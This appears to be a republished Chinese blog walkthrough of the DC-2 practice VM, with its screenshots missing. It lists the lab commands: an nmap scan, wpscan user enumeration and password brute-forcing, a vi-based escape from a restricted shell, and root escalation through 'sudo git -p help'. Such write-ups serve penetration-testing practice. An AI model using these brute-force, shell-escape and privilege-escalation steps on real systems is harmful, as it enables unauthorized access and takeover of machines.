首页 > 其他 > 详细

DC-2

时间:2021-03-06 23:56:53      阅读:30      评论:0      收藏:0      [点我收藏+]

DC-2

发现主机

技术分享图片

扫描主机

nmap -A -T4 -v -p- 192.168.233.148

技术分享图片

访问80

技术分享图片

访问不同

hosts文件修改

vim /etc/hosts

技术分享图片

再次访问(flag1)

技术分享图片

默认后台

技术分享图片

制作字典(crew)

密码

技术分享图片

用户名

技术分享图片

wpscan扫描

wpscan --url http://dc-2 -e u

技术分享图片

保存

技术分享图片

爆破

wpscan --url http://dc-2 -U username.txt -P passwd.txt

技术分享图片

登录

jerry

技术分享图片

技术分享图片

tom

技术分享图片

尝试7744端口

技术分享图片

ssh登录

Jerry 无法登录

技术分享图片

tom 可以登录

技术分享图片

技术分享图片

搜索查看命令

导出环境变量

技术分享图片

查看可以使用的命令

技术分享图片

使用less查看flag3

技术分享图片

切换到jerry

su无法使用

技术分享图片

Restricted shell绕过

vi 3
:set shell =/bin/sh
:shell(执行完上一条再执行)
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin (设置环境变量)

技术分享图片

flag4

技术分享图片

git提权

技术分享图片

提示git nopasswd

提权命令

sudo git -p help

技术分享图片

技术分享图片

修改root密码

技术分享图片

切换到root

技术分享图片

DC-2

原文:https://www.cnblogs.com/liyu8/p/14491885.html
(0)
(0)
   
举报
评论 一句话评论(0
分享档案
更多>
2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)
最新文章
更多>
教程昨日排行
更多>
友情链接
汇智网   PHP教程   插件网  
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!